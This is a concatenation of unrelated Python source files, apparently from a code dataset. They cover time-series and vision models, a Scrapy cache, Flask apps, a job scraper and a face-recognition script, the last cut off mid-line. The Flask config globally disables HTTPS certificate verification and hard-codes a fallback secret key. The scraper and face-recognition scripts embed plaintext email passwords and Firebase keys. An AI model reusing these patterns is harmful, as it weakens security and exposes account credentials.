import PositionalEmbedding\r\nfrom layers.AutoCorrelation import AutoCorrection, AutoCorrelationLayer\r\nfrom layers.AutoformerEncoder import Encoder, EncoderLayer, SeriesDecomposition\r\n\r\n\r\nclass Model(nn.Module):\r\n \"\"\"\r\n Autoformer is the first method to achieve the series-wise connection,\r\n with inherent O(LlogL) complexity\r\n \"\"\"\r\n def __init__(self, configs):\r\n super(Model, self).__init__()\r\n self.decomp = SeriesDecomposition(configs.moving_avg)\r\n self.enc_embedding = PositionalEmbedding(configs.d_model)\r\n self.encoder = Encoder(\r\n [\r\n EncoderLayer(\r\n AutoCorrelationLayer(AutoCorrection(configs.factor, configs.dropout),\r\n configs.d_model, configs.n_heads),\r\n configs.d_model,\r\n configs.d_ff,\r\n moving_avg=configs.moving_avg,\r\n dropout=configs.dropout,\r\n activation=configs.activation\r\n ) for _ in range(configs.e_layers)\r\n ]\r\n )\r\n self.projection = nn.Linear(configs.seq_len * configs.d_model, configs.c_out, bias=True)\r\n\r\n def forward(self, x):\r\n enc_out = x + self.enc_embedding(x)\r\n enc_out = self.encoder(enc_out)\r\n B, _, _ = enc_out.shape\r\n enc_out = self.projection(enc_out.view(B, -1))\r\n return enc_out\r\n","repo_name":"Allaniiibigdevil/Master-Arbeit","sub_path":"models/Autoformer.py","file_name":"Autoformer.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"38941355804","text":"import bson\nimport logging\nfrom time import time\nfrom pymongo import MongoClient\n\nfrom scrapy.responsetypes import responsetypes\nfrom scrapy.http import Headers\nfrom scrapy.utils.request import request_fingerprint\nfrom . import Config\nfrom .util import convert\n\nclass MongoCacheStorage(object):\n def __init__(self, settings):\n self.settings = settings\n self.config = Config(settings)\n self.expiration_secs = settings.getint('HTTPCACHE_EXPIRATION_SECS')\n self.logger = logging.getLogger(__name__)\n\n def open_spider(self, spider):\n self.clt = MongoClient(self.config.host)\n self.db = self.clt[self.config.database_name()]\n self.col = self.db['cache']\n\n def close_spider(self, spider):\n self.clt.close()\n\n def retrieve_response(self, spider, request):\n \"\"\"Return response if present in cache, or None otherwise.\"\"\"\n key = self._request_key(request)\n\n data = self.col.find_one({'key': key})\n if not data: # not cache\n return \n\n # expiration?\n mtime = data['meta']['timestamp']\n if 0 < self.expiration_secs < time() - float(mtime):\n return # expired\n \n # retrieve\n body = data['response_body']\n url = str(data.get('url'))\n status = data['meta']['status']\n headers = Headers(data['response_headers'])\n respcls = responsetypes.from_args(headers=headers, url=url)\n response = respcls(url=url, headers=headers, status=status, body=body)\n return response\n\n def store_response(self, spider, request, response):\n \"\"\"Store the given response in the cache.\"\"\"\n key = self._request_key(request)\n data = {\n 'url': request.url,\n 'key': key,\n 'meta' : {\n 'url': request.url,\n 'method': request.method,\n 'status': response.status,\n 'response_url': response.url,\n 'timestamp': time(),\n },\n 'response_headers' : convert(response.headers),\n 'response_body': bson.binary.Binary(response.body),\n 'request_headers' : convert(request.headers),\n 'request_body': bson.binary.Binary(request.body)\n }\n #self.logger.info(request.url)\n #self.logger.info(data)\n self.col.update({'key': key}, data, upsert=True)\n\n def 
_request_key(self, request):\n return str(request_fingerprint(request))\n\n\n\n\n\nfrom scrapy.dupefilters import BaseDupeFilter\nfrom scrapy.utils.request import request_fingerprint\nfrom . import Config\n\nclass CacheDupeFilter(BaseDupeFilter):\n \"\"\"DupeFilter which can be used wth MongoCacheStorage\"\"\"\n\n def __init__(self, settings, debug=False):\n self.config = Config(settings)\n self.debug = debug\n self.logger = logging.getLogger(__name__)\n\n @classmethod\n def from_crawler(cls, crawler):\n return cls.from_settings(crawler.settings)\n\n @classmethod\n def from_settings(cls, settings):\n debug = settings.getbool('DUPEFILTER_DEBUG')\n return cls(settings, debug)\n\n def request_seen(self, request):\n fp = request_fingerprint(request)\n return self.col.count({'key': fp }) > 0\n \n def open(self):\n self.clt = MongoClient(self.config.host)\n self.db = self.clt[self.config.database_name()]\n self.col = self.db['cache']\n self.logger.debug(\"%s:%s %s\" % (type(self).__name__, '__init___', [self.config, self.clt, self.db]))\n\n def close(self, reason):\n \"\"\"Delete data on close. Called by scrapy's scheduler\"\"\"\n self.clt.close()\n\n def clear(self):\n \"\"\"Clears fingerprints data\"\"\"\n self.server.delete(self.key)\n","repo_name":"roadt/scrapymongo","sub_path":"cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"42880024296","text":"import os\n\nfrom flask import Flask, g, current_app\nimport jinja2\nfrom envio_email_api.metrics import Metrics\nfrom flask_login import LoginManager\nfrom collections import OrderedDict\n\ntry:\n # Due: https://www.python.org/dev/peps/pep-0476\n import ssl\n try:\n _create_unverified_https_context = ssl._create_unverified_context\n except AttributeError:\n # Legacy Python that doesn't verify HTTPS certificates by default\n pass\n else:\n # Handle target environment that doesn't support HTTPS verification\n ssl._create_default_https_context = _create_unverified_https_context\nexcept ImportError:\n pass\n\n\n\nmetrics = Metrics()\n\n\ndef create_app(**config):\n \"\"\"\n Create a EnvioEmailApi app\n :param config:\n :return: EnvioEmailApi app\n \"\"\"\n app = Flask(__name__, static_folder=None)\n app.config.from_envvar('EnvioEmailApi_SETTINGS', silent=True)\n app.config.update(config)\n\n if not app.config['SECRET_KEY']:\n app.config['SECRET_KEY'] = '343234234324234234344342423'\n\n if 'LOG_LEVEL' not in app.config:\n app.config['LOG_LEVEL'] = 'DEBUG'\n\n configure_login(app)\n configure_babel(app)\n configure_api(app)\n configure_backend(app)\n configure_metrics(app)\n configure_json_encoder(app)\n configure_cors(app)\n\n return app\n\n\ndef configure_api(app):\n \"\"\"\n Configure diffenrend API endpoints\n :param app: Flask application\n :return:\n \"\"\"\n from envio_email_api.api import EnvioEmailApi\n from envio_email_api.api import resources\n\n api = EnvioEmailApi(prefix='/api/v1')\n\n # Default Resources\n resources_index = OrderedDict([(r[1], r) for r in resources])\n\n # Custom packages resources\n import importlib\n import pkg_resources\n importlib.reload(pkg_resources)\n\n from pkg_resources import working_set\n\n templates_loader = [app.jinja_loader]\n\n\n\n app.jinja_loader = jinja2.ChoiceLoader(templates_loader)\n\n for resource in resources_index.values():\n print('Loading resource {} in {}'.format(\n resource[0], resource[1]\n ))\n api.add_resource(*resource)\n\n api.init_app(app)\n\n\ndef 
setup_backend_conn():\n try:\n import firebase_admin\n from firebase_admin import credentials\n from firebase_admin import firestore\n\n # Use a service account\n fileDir = os.path.dirname(os.path.realpath('__file__'))\n filename = os.path.join(fileDir, 'envio_email_api/clave.json')\n\n cred = credentials.Certificate(filename)\n try:\n\n firebase_admin.initialize_app(cred)\n g.backend_cnx = firestore.client()\n except:\n g.backend_cnx = firestore.client()\n\n\n\n except Exception as exc:\n current_app.logger.critical(\"ERROR setting up backend: {}\".format(exc))\n\ndef noquote(s):\n return s\n\ndef configure_backend(app):\n app.before_request(setup_backend_conn)\n\n\ndef configure_metrics(app):\n metrics.init_app(app)\n\n\ndef configure_login(app):\n from envio_email_api.login import load_user_from_header, load_user, CustomSessionInterface\n login_manager = LoginManager()\n login_manager.init_app(app)\n # Add request loader callback\n login_manager.request_loader(load_user_from_header)\n login_manager.user_loader(load_user)\n app.session_interface = CustomSessionInterface()\n\n\ndef configure_babel(app):\n \"\"\"Configure Babel for app\n \"\"\"\n if 'BABEL_DEFAULT_LOCALE' not in app.config:\n app.config['BABEL_DEFAULT_LOCALE'] = 'es'\n app.config['BABEL_TRANSLATION_DIRECTORIES'] = 'translations'\n\n\n\n\ndef configure_json_encoder(app):\n from envio_email_api.utils import CustomJSONEncoder\n app.json_encoder = CustomJSONEncoder\n\n\ndef configure_cors(app):\n from flask_cors import CORS\n cors = CORS(origins=['*'])\n cors.init_app(app)\n\n","repo_name":"al118345/envio_email_api_python","sub_path":"envio_email_api/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34735949678","text":"import pandas as pd\nimport firebase_admin\nfrom firebase_admin import firestore\n\napp = firebase_admin.initialize_app()\ndb = firestore.client()\n\ndf = pd.read_csv('output.csv')\ndf = df.fillna('')\ndata = df.to_dict('records')\nprint('Length of data:', data)\nres = []\n\nFOOD_COLLECTION = 'food'\n\nfor rec in data:\n name = rec.get('name').lower()\n del rec['name']\n print(name)\n doc_ref = db.collection(FOOD_COLLECTION).document(name)\n doc_ref.set(rec)\n","repo_name":"AbhinaavRamesh/PennApps","sub_path":"scripts/upload_food_data.py","file_name":"upload_food_data.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9993784376","text":"import os\nimport sys\nimport cv2\nimport json\nimport glob\nimport math\nimport torch\nimport argparse\nsys.path.append(os.getcwd())\n\nimport numpy as np\n\nfrom tqdm import tqdm\nfrom PIL import ImageDraw, Image\n\nfrom proxy_simulator.renderer import BaseRenderer\nfrom proxy_simulator.carla_wrapper import CarlaWrapper\n\n\nGPU_PI = torch.tensor([np.pi], device=\"cuda\", dtype=torch.float32)\nBB_EXTENT = torch.tensor([[0.90,2.20],[0.90,-2.20],[-0.90, -2.20],[-0.90, 2.20]]).cuda()\n\n\nclass BEVVisualizer:\n def __init__(self, args):\n \"\"\"\n \"\"\"\n self.args = args\n self.carla_wrapper = CarlaWrapper(args)\n\n self.log_file_paths, self.results_file_paths = self.parse_scenario_log_dir()\n\n self.town = None\n self.max_iter = self.fetch_max_iter()\n\n def visualize(self):\n \"\"\"\n Visualizes logs in a simple abstract BEV representation that is centered\n on the ego agent. 
Can dump .gifs or .mp4s.\n \"\"\"\n # loop over all logs\n for log_path, results_path in tqdm(\n zip(self.log_file_paths, self.results_file_paths), total=len(self.log_file_paths)\n ):\n log = self.parse_json_file(log_path)\n results = self.parse_json_file(results_path)\n\n # extract meta data\n name = log[\"meta_data\"][\"name\"]\n town = log[\"meta_data\"][\"town\"]\n density = log_path.split(\"/\")[1].split(\"_\")[-1]\n critical_iter = results[\"first_metrics\"][\"iteration\"]\n\n if self.args.opt_iter == -1:\n if critical_iter <= self.max_iter[density][town]:\n opt_iter = critical_iter\n else:\n opt_iter = self.max_iter[density][town]\n else:\n opt_iter = self.args.opt_iter\n \n # set town in relevant components if necessary\n if town != self.town:\n global_map, map_offset = self.carla_wrapper._initialize_from_carla(town)\n renderer = BaseRenderer(\n self.args, map_offset, global_map.shape[2:4], viz=True\n )\n\n bev_overview_vis_per_t = []\n for t, state in enumerate(log[\"states\"][opt_iter]):\n # map dict of lists to dict of tensors\n for substate in state:\n state[substate] = torch.tensor(\n state[substate],\n device=self.args.device,\n )\n\n # fetch local crop of map\n local_map = renderer.get_local_birdview(\n global_map,\n state[\"pos\"].unsqueeze(0)[:, 0:1], # ego pos as origin\n state[\"yaw\"].unsqueeze(0)[:, 0:1], # ego yaw as reference\n )\n\n vehicle_corners = self.get_corners_vectorized(\n BB_EXTENT,\n state[\"pos\"].unsqueeze(0),\n state[\"yaw\"].unsqueeze(0),\n )\n\n vehicle_corners = renderer.world_to_pix_crop(\n vehicle_corners, \n state[\"pos\"].unsqueeze(0)[:, 0:1], # ego pos as origin\n state[\"yaw\"].unsqueeze(0)[:, 0:1], # ego yaw as reference\n )\n\n vehicle_corners = vehicle_corners.detach().cpu().numpy()\n vehicle_corners = vehicle_corners[0].reshape(vehicle_corners.shape[1]//4,4,2)\n\n bev_vis = self.tensor_to_pil(local_map)\n bev_overview_vis_draw = ImageDraw.Draw(bev_vis)\n\n for i in range(vehicle_corners.shape[0]):\n if i == 0:\n bev_overview_vis_draw.polygon(vehicle_corners[i].flatten(),fill=(222, 112, 97),outline=(0, 0, 0))\n bev_overview_vis_draw.polygon(np.concatenate([vehicle_corners[i][2], vehicle_corners[i][1], np.mean(vehicle_corners[i], axis=0)]),outline=(0, 0, 0))\n else:\n bev_overview_vis_draw.polygon(vehicle_corners[i].flatten(),fill=(105, 156, 219),outline=(0, 0, 0))\n bev_overview_vis_draw.polygon(np.concatenate([vehicle_corners[i][2], vehicle_corners[i][1], np.mean(vehicle_corners[i], axis=0)]),outline=(0, 0, 0))\n\n bev_overview_vis_per_t.append(bev_vis)\n \n save_path = os.path.join(os.path.dirname(log_path), name + f\"_iter_{opt_iter}\")\n\n # save frames as gif\n bev_overview_vis_per_t[0].save(\n save_path + '.gif', \n save_all=True, \n append_images=bev_overview_vis_per_t[1:], \n optimize=True,\n loop=0,\n )\n\n # save frames as .mp4\n # codec = cv2.VideoWriter_fourcc(*'mp4v') \n # video_writer = cv2.VideoWriter(save_path + \".mp4\",codec, 4, bev_overview_vis_per_t[0].size) \n # for timestep in range(len(log[\"states\"])):\n # video_writer.write(cv2.cvtColor(\n # np.array(bev_overview_vis_per_t[timestep]), cv2.COLOR_RGB2BGR))\n # video_writer.release()\n\n def tensor_to_pil(self, grid):\n \"\"\"\n \"\"\"\n colors = [\n (120, 120, 120), # road\n (253, 253, 17), # lane\n (0, 0, 142), # vehicle\n ]\n \n grid = grid.detach().cpu()\n\n grid_img = np.zeros((grid.shape[2:4] + (3,)), dtype=np.uint8)\n grid_img[...] = [225, 225, 225]\n \n for i in range(len(colors)):\n grid_img[grid[0, i, ...] 
> 0] = colors[i]\n\n pil_img = Image.fromarray(grid_img)\n\n return pil_img\n\n def get_corners_vectorized(self, extent, pos, yaw):\n yaw = GPU_PI/2 -yaw\n extent = extent.unsqueeze(-1)\n\n rot_mat = torch.cat(\n [\n torch.cos(yaw), torch.sin(yaw),\n -torch.sin(yaw), torch.cos(yaw),\n ],\n dim=-1,\n ).view(yaw.size(1), 1, 2, 2).expand(yaw.size(1), 4, 2, 2)\n\n rotated_corners = rot_mat @ extent\n\n rotated_corners = rotated_corners.view(yaw.size(1), 4, 2) + pos[0].unsqueeze(1)\n \n return rotated_corners.view(1, -1, 2)\n\n def fetch_max_iter(self):\n # read timings dict from json file\n with open('tools/timings.json') as f:\n timings = json.load(f)\n\n max_iter = {}\n max_GPU_seconds = 180\n for density in [\"1\", \"2\", \"4\"]:\n timings_per_town_per_density = timings[self.args.optim_method][density]\n max_iter[density] = {} \n for town, timing in timings_per_town_per_density.items():\n max_iter[density][str(town)] = math.floor(max_GPU_seconds / timing)\n return max_iter\n \n def parse_scenario_log_dir(self):\n \"\"\"\n Parse generation results directory and gather \n the JSON file paths from the per-route directories.\n \"\"\"\n route_scenario_dirs = sorted(\n glob.glob(\n self.args.scenario_log_dir + \"/**/RouteScenario*/\", recursive=True\n ),\n key=lambda path: (path.split(\"_\")[-6]),\n )\n\n # gather all records and results JSON files\n results_files = []\n records_files = []\n for dir in route_scenario_dirs:\n results_files.extend(\n sorted(\n glob.glob(dir + \"results.json\")\n )\n )\n records_files.extend(\n sorted(\n glob.glob(dir + \"scenario_records.json\")\n )\n )\n\n return records_files, results_files\n\n def parse_json_file(self, records_file):\n \"\"\"\n \"\"\"\n return json.loads(open(records_file).read())\n\n\ndef main(args):\n \"\"\"\n \"\"\"\n vizualizer = BEVVisualizer(args)\n vizualizer.visualize()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n \n parser.add_argument(\n \"--scenario_log_dir\",\n type=str,\n default=\"generation_results\",\n help=\"The directory containing the per-route directories with the \"\n \"corresponding scenario log .json files.\",\n )\n parser.add_argument(\n \"--opt_iter\",\n type=int,\n default=-1,\n help=\"Specifies at which iteration in the optimization process the \"\n \"scenarios should be visualized. Set to -1 to automatically \"\n \"select the critical perturbation for each scenario.\",\n )\n parser.add_argument(\n \"--optim_method\",\n default=\"Adam\",\n choices=[\"Adam\", \"Both_Paths\"]\n )\n parser.add_argument(\n \"--device\",\n type=str,\n default=\"cuda\",\n )\n parser.add_argument(\n \"--port\",\n type=int,\n default=2000,\n help=\"Carla port.\"\n )\n parser.add_argument(\n \"--batch_size\",\n type=int,\n default=1,\n help=\"The number of parallel simulations.\"\n )\n\n args = parser.parse_args()\n\n main(args)","repo_name":"autonomousvision/king","sub_path":"tools/visualize_scenarios.py","file_name":"visualize_scenarios.py","file_ext":"py","file_size_in_byte":9025,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"52"} +{"seq_id":"11009942640","text":"\"\"\"Memory, puzzle game of number pairs.\n\nExercises:\n\n1. Count and print how many taps occur.\n2. Decrease the number of tiles to a 4x4 grid.\n3. Detect when all tiles are revealed.\n4. Center single-digit tile.\n5. 
Use letters instead of tiles.\n\"\"\"\n\nfrom random import *\nfrom turtle import *\n\nfrom freegames import path\n\ncar = path('car.gif')\ntiles = list(range(32)) * 2\nstate = {'mark': None}\nhide = [True] * 64\ntaps = 0  # counter for the total number of taps\ncomplete = 0  # counter for the number of completed pairs\n\n\ndef square(x, y):\n    \"\"\"Draw white square with black outline at (x, y).\"\"\"\n    up()\n    goto(x, y)\n    down()\n    color('black', 'white')\n    begin_fill()\n    for count in range(4):\n        forward(50)\n        left(90)\n    end_fill()\n\n\ndef index(x, y):\n    \"\"\"Convert (x, y) coordinates to tiles index.\"\"\"\n    return int((x + 200) // 50 + ((y + 200) // 50) * 8)\n\n\ndef xy(count):\n    \"\"\"Convert tiles count to (x, y) coordinates.\"\"\"\n    return (count % 8) * 50 - 200, (count // 8) * 50 - 200\n\n\ndef tap(x, y):\n    \"\"\"Update mark and hidden tiles based on tap.\"\"\"\n    global taps, complete  # declare globals so assignment updates the module-level counters\n    spot = index(x, y)\n    mark = state['mark']\n    taps += 1  # count this tap\n    print('Taps: ', taps)  # show the running tap count in the terminal\n\n    if mark is None or mark == spot or tiles[mark] != tiles[spot]:\n        state['mark'] = spot\n    else:\n        hide[spot] = False\n        hide[mark] = False\n        state['mark'] = None\n        complete += 1  # one more pair completed\n\n    if complete == 32:\n        print('You Win!!!')  # all 32 pairs have been revealed\n\ndef draw():\n    \"\"\"Draw image and tiles.\"\"\"\n    clear()\n    goto(0, 0)\n    shape(car)\n    stamp()\n\n    for count in range(64):\n        if hide[count]:\n            x, y = xy(count)\n            square(x, y)\n\n    mark = state['mark']\n\n    if mark is not None and hide[mark]:\n        x, y = xy(mark)\n        up()\n        goto(x + 2, y)\n        color('black')\n        write(tiles[mark], font=('Arial', 30, 'normal'))\n\n    update()\n    ontimer(draw, 100)\n\n\nshuffle(tiles)\nsetup(420, 420, 370, 0)\naddshape(car)\nhideturtle()\ntracer(False)\nonscreenclick(tap)\ndraw()\ndone()","repo_name":"cBarredez/TC1001S","sub_path":"videojuegos/juegoMemory/Memory_edit.py","file_name":"Memory_edit.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72450644646","text":"from flask import Blueprint, jsonify, request\nfrom flask_cors import cross_origin\n\nfrom app.repository.default_ner_tag_repository import DefaultNerTagRepository\nfrom app.repository.spacy_tokenizer_repository import SpacyTokenizerRepository\nfrom app.repository.annotation_span_dataset_tag_repository import AnnotationSpanDatasetTagRepository\nfrom app.repository.document_repository import DocumentRepository\nfrom app.repository.annotation_span_repository import AnnotationSpanRepository\nfrom app.service.annotation_span_dataset_tag_service import AnnotationSpanDatasetTagService\nfrom app.service.document_service import DocumentService\nfrom app.service.utilities import Utilities\nfrom app.repository.dataset_tag_repository import DatasetTagRepository\n\ndocuments = Blueprint('routes', __name__)\n\ntokenizerRepository = SpacyTokenizerRepository()\nnerTagRepository = DefaultNerTagRepository(tokenizerRepository)\ndocumentService = DocumentService(DocumentRepository(), AnnotationSpanRepository())\nannotationSpanDatasetTagService = AnnotationSpanDatasetTagService(AnnotationSpanDatasetTagRepository(), AnnotationSpanRepository(), DatasetTagRepository())\n\n# /api/document\n@documents.route('/', methods=['GET'])\n@cross_origin(origin='*')\ndef get_all():\n    document = documentService.get_all()\n\n    return 
jsonify(Utilities.serialize_list(document))\n\n\n@documents.route('/', methods=['GET'])\n@cross_origin(origin='*')\ndef get_by_id(id):\n datasetFilter = request.args.get(\"datasets\")\n sourceFilter = request.args.get(\"sources\")\n document = documentService.get_by_id(id)\n annotation_spans = annotationSpanDatasetTagService.find_by_document(id, datasetFilter, sourceFilter)\n tokens = nerTagRepository.annotation_spans_to_ner_array(document.text, annotation_spans)\n # datasets = Null\n\n response = {\n \"document\": document.serialized,\n \"tokens\": Utilities.serialize_list(tokens)\n }\n\n return jsonify(response)\n\n@documents.route('/sources', methods=['GET'])\n@cross_origin(origin='*')\ndef get_all_sources():\n sources = annotationSpanDatasetTagService.get_all_sources()\n\n return jsonify(list(map(lambda s: s[0], sources)))\n\n@documents.route('/', methods=['POST'])\n@cross_origin(origin='*')\ndef add():\n id = request.form.get('id')\n text = request.form.get('text')\n meta_data = request.form.get('meta_data')\n corpus_id = request.form.get('corpus_id')\n document = documentService.save(id, text, meta_data, corpus_id)\n\n return document.serialized\n\n\n@documents.route('//edit', methods=['PUT'])\n@cross_origin(origin='*')\ndef edit(id):\n text = request.form.get('text')\n status = request.form.get('status')\n corpus_id = request.form.get('corpus_id')\n document = documentService.edit(id, text, status, corpus_id)\n\n return document.serialized\n\n\n@documents.route('//delete', methods=['DELETE'])\n@cross_origin(origin='*')\ndef delete(id):\n document = documentService.delete(id)\n\n return document.serialize\n\n\n@documents.route('//validate', methods=['PUT'])\n@cross_origin(origin='*')\ndef validate(id):\n document = documentService.validate(id)\n\n return document.serialized\n","repo_name":"ivanandreski/food-wiz-kiii","sub_path":"backend/app/web/document_routes.py","file_name":"document_routes.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"926262528","text":"import requests\nimport smtplib\nfrom http import HTTPStatus\nfrom bs4 import BeautifulSoup as BS\nimport robots\nURL = 'https://www.jpsc.gov.in'\n\n\ndef find_jpsc_jobs():\n jobs_list = []\n res = requests.get(URL)\n if res.status_code == HTTPStatus.OK:\n soup = BS(res.content, 'lxml')\n # latest_job = soup.find_all('ul', attrs={'id': 'ulid'})\n latest_job = soup.select('#ulid li')\n for jobs in latest_job:\n jobs_list.append([jobs.text.replace('\\n', ''), URL + '/' + jobs.find('a').get('href')])\n\n jobs = '\\n'.join([str(job) for job in jobs_list ])\n print(jobs)\n send_mail(jobs)\n\n\ndef send_mail(message):\n gmail_user = 'deepakjon31@gmail.com'\n gmail_password = 'Devi12345@'\n\n sent_from = gmail_user\n # to = ['siteshkumar536@gmail.com', 'pappu095@gmail.com']\n to = ['sahoosurabhi@gmail.com']\n subject = 'JPSC lates Jobs'\n body = 'Hi,\\n\\n Please find below JPSC jobs and do apply :) \\n\\n' + message + \\\n '\\n\\n Thanks,\\n Deepak\\n\\nThis is System generated mail, Have a good day and Enjoy!!!'\n\n email_text = \"\"\"\\\n From: %s\n To: %s\n Subject: %s\n \n %s\n \"\"\" % (sent_from, \", \".join(to), subject, body)\n\n try:\n server = smtplib.SMTP('smtp.gmail.com:587')\n server.starttls()\n server.login(gmail_user, gmail_password)\n server.sendmail(sent_from, to, email_text)\n server.quit()\n print('Email sent!')\n except Exception as e:\n print('Something went wrong...', e)\n\n\nif __name__ == '__main__':\n # 
if robots.check('/ebooks/', 'http://www.google.com'):\n if robots.check(URL):\n find_jpsc_jobs()\n # print(\"Deepak\")\n else:\n print(\"kumar\")\n # find_jpsc_jobs()","repo_name":"deepakjon31/dataScientist","sub_path":"scrape/jpsc_jobs.py","file_name":"jpsc_jobs.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31264558566","text":"#!/usr/bin/python3\n\nfrom math import sqrt\n\n\nclass PathSegment():\n def __init__(self, x1, y1, x2, y2):\n self.x1 = x1\n self.y1 = y1\n self.x2 = x2\n self.y2 = y2\n self.dx = x2 - x1\n self.dy = y2 - y1\n\n self.calculateStandard()\n self.length = self.getDistance(x1, y1, x2, y2)\n\n def calculateStandard(self):\n \"\"\"\n Calculate the standard form for the line segment \n (i.e. ax + by + c = 0)\n \"\"\"\n self.a = self.y1 - self.y2\n self.b = self.x2 - self.x1\n self.c = -(self.a * self.x1 + self.b * self.y1)\n\n @staticmethod\n def getDistance(x1, y1, x2, y2):\n \"\"\"\n Calculate the distance between two points\n \"\"\"\n return sqrt((x2 - x1)**2 + (y2 - y1)**2)\n\n def dotProduct(self, x, y):\n \"\"\"\n Calculate the dot product of vectors (x-x1, y-y1) and (x2-x1, y2-y1)\n \"\"\"\n dx = x - self.x1\n dy = y - self.y1\n return self.dx * dx + self.dy * dy\n\n def findClosestPoint(self, xv, yv):\n \"\"\"\n Find point on path segment closest to vehicle\n https://en.wikipedia.org/wiki/Distance_from_a_point_to_a_line\n \"\"\"\n den = self.a**2 + self.b**2\n x = (self.b * (self.b * xv - self.a * yv) - self.a * self.c) / den\n y = (self.a * (-self.b * xv + self.a * yv) - self.b * self.c) / den\n\n # Calculate the percentage completed of the segment\n index = self.dotProduct(x, y) / (self.length**2)\n\n return (x, y, index)\n\n def findCircleIntersection(self, x, y, radius):\n \"\"\"\n Find intersection between path segment and a circle. 
\n        (x, y) = closest point on path to vehicle, \n        radius = lookahead distance\n        http://mathworld.wolfram.com/Circle-LineIntersection.html\n        \"\"\"\n        x1 = self.x1 - x\n        y1 = self.y1 - y\n        x2 = self.x2 - x\n        y2 = self.y2 - y\n        dx = x2 - x1\n        dy = y2 - y1\n        dr2 = dx * dx + dy * dy\n        det = x1 * y2 - x2 * y1\n\n        discrim = dr2 * radius * radius - det * det\n        if (discrim >= 0):\n            sqrtDiscrim = sqrt(discrim)\n            sign = -1 if (dy < 0) else 1\n\n            posX = (det * dy + sign * dx * sqrtDiscrim) / dr2 + x\n            posY = (-det * dx + abs(dy) * sqrtDiscrim) / dr2 + y\n            negX = (det * dy - sign * dx * sqrtDiscrim) / dr2 + x\n            negY = (-det * dx - abs(dy) * sqrtDiscrim) / dr2 + y\n\n            posDot = self.dotProduct(posX, posY)\n            negDot = self.dotProduct(negX, negY)\n\n            # Return the point on the segment closest to the end\n            if (posDot < 0 and negDot >= 0):\n                return (negX, negY)\n            elif (posDot >= 0 and negDot < 0):\n                return (posX, posY)\n            else:\n                dPos = PathSegment.getDistance(self.x2, self.y2, posX, posY)\n                dNeg = PathSegment.getDistance(self.x2, self.y2, negX, negY)\n                if (dPos < dNeg):\n                    return (posX, posY)\n                else:\n                    return (negX, negY)\n\n        else:\n            return (None, None)\n","repo_name":"maxwellpettit/PythonRobot","sub_path":"src/pursuit/pathSegment.py","file_name":"pathSegment.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"2664209483","text":"# Samuel Schwarcz\n\nimport cv2\nimport matplotlib.pyplot as plt\nimport signal\nfrom IPython import display\nfrom skimage.transform import resize\nfrom threading import Thread\nimport face_recognition\nimport shutil\nimport os\nfrom termcolor import colored #not important\nimport dlib\nfrom imutils.video import VideoStream\nfrom imutils import face_utils\nimport pyrebase\n\n\nconfig = {\n  \"apiKey\": \"AIzaSyCJOFIBO5g-ZVBNlebfldboRuEYQC-KSRo\",\n  \"authDomain\": \"smartcity-187de.firebaseapp.com\",\n  \"databaseURL\": \"https://smartcity-187de.firebaseio.com\",\n  \"storageBucket\": \"smartcity-187de.appspot.com\",\n  \"serviceAccount\": \"C:/Users/Dell/Desktop/smartcity.json\"\n}\n\nfirebase = pyrebase.initialize_app(config)\nauth = firebase.auth()\n#authenticate a user\nuser = auth.sign_in_with_email_and_password(\"eladha190@gmail.com\", \"12345678\")\nstorage = firebase.storage()\ndb = firebase.database()\n\npredictor_path = r'C:\\Users\\Dell\\Desktop\\projetFinal\\Models\\shape_predictor_68_face_landmarks1.dat'\ntest_directory=r'C:\\Users\\Dell\\Desktop\\DirExit'\n\nclass Index():\n    indexImg = 0\n    indexDir = 1\n    indexPhotog = 0\n\n    cam = None\n    faces = None\n    frame = None\n\n\n\nclass Camera(Thread):####################################CAMERA\n\n    def __init__(self,cam ,faces,frame):\n        Thread.__init__(self)\n        self.frame=frame\n        self.faces=faces\n        self.cam=cam\n        self.n_img_per_person=1\n\n\n    def getNewPicture(self):\n        self.frame =Index.frame\n        self.cam=Index.cam\n        self.faces=Index.faces\n        pass\n\n    def moveImage(self,path):\n        os.rename('C:\\\\Users\\\\Dell\\\\Desktop\\\\DirPers\\\\'+path,test_directory+'\\\\'+path)\n        pass\n\n    def PrintPicture(self, photo, cam,x ,y ,w ,h):\n\n        frame = cam.read() ## to save the frame\n        crop_img = frame[y:y + h, x:x + w] ##crop the picture\n        img = crop_img\n\n        try:\n            aligned = cv2.resize(img, (320, 430)) ## resize the picture\n        except Exception:\n            print(colored(\"problem with the resize\",'green'))\n            self.getNewPicture()\n            self.run()\n            return\n\n        self.deletePers(aligned)\n        pass\n\n\n    def deletePers(self,picture): # compare the face distances and delete the matching photo\n\n\n        image_dir_basepath = 'C:\\\\Users\\\\Dell\\\\Desktop\\\\DirPers\\\\'\n        list = os.listdir(image_dir_basepath)\n\n        exit_man_image = picture\n        exit_man_encodings = face_recognition.face_encodings(exit_man_image)\n        if len(exit_man_encodings) > 0:\n            exit_man_encoding = exit_man_encodings[0]\n        else:\n            print(colored(\"problem with the exit-picture encoding\", 'green'))\n            self.getNewPicture()\n            self.run()\n            return True\n\n        for namePic in list:\n\n            search_image = face_recognition.load_image_file(image_dir_basepath + namePic + '\\\\image0.jpg')\n\n            search_encodings = face_recognition.face_encodings(search_image)\n            if len(search_encodings) > 0:\n                search_encoding = search_encodings[0]\n            else:\n                print(colored(\"problem with the search 